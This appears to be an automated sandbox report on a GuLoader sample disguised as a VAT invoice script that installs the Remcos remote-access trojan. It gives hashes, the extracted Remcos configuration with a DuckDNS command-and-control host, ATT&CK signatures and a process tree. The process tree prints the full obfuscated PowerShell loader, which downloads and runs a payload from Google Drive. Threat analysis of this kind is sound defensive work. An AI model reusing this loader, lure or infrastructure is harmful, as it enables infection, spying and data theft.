guloader | 3901899b68107339513878c5a32c351f4ce28f82c479490a8350922acb04c8e3

General

Target

Faktura_VAT__U2409161195150793564·pdf.vbs
Size

39KB
MD5

a8eaec0ce9a1a02805ca7248d61dce62
SHA1

3adc63cda4f1d797b49b0ae721cbb41caecda524
SHA256

c54caab4e2957ad82b579e23bb079984b7aaf13484f8c5989a6b4aa84048bc2c
SHA512

aac88d2ba244c376eee4ce0ea38050b95e45f682d7f667b11d016e77822484864f5c6b7fa8b0ea6bc98463c2e3dcfd0bdc3bd2bc16204368109512d28ecd472a
SSDEEP

384:Z9vOg3gWe95Arw8M+OJWlZjYUKsA8r7Opt/in6M6zyQQZWnspmErww6u3TTluQeW:Zp3gWU8MaSpBm6eMs34W30atvp

Score

10^/10

guloader remcos remotehost discovery downloader execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	1100	powershell.exe
12	1100	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1100	powershell.exe
1620	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
10	drive.google.com
26	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1620	powershell.exe
1100	powershell.exe
2808	cmd.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3440	wabmig.exe
3440	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1620	powershell.exe
3440	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1620 set thread context of 3440	1620	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1100	powershell.exe
1100	powershell.exe
1620	powershell.exe
1620	powershell.exe
1620	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1620	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3440	wabmig.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3396 wrote to memory of 1100	3396	WScript.exe	86
PID 3396 wrote to memory of 1100	3396	WScript.exe	86
PID 1100 wrote to memory of 3600	1100	powershell.exe	88
PID 1100 wrote to memory of 3600	1100	powershell.exe	88
PID 1100 wrote to memory of 2808	1100	powershell.exe	94
PID 1100 wrote to memory of 2808	1100	powershell.exe	94
PID 2808 wrote to memory of 1620	2808	cmd.exe	95
PID 2808 wrote to memory of 1620	2808	cmd.exe	95
PID 2808 wrote to memory of 1620	2808	cmd.exe	95
PID 1620 wrote to memory of 4548	1620	powershell.exe	96
PID 1620 wrote to memory of 4548	1620	powershell.exe	96
PID 1620 wrote to memory of 4548	1620	powershell.exe	96
PID 1620 wrote to memory of 3440	1620	powershell.exe	97
PID 1620 wrote to memory of 3440	1620	powershell.exe	97
PID 1620 wrote to memory of 3440	1620	powershell.exe	97
PID 1620 wrote to memory of 3440	1620	powershell.exe	97
PID 1620 wrote to memory of 3440	1620	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_VAT__U2409161195150793564·pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL 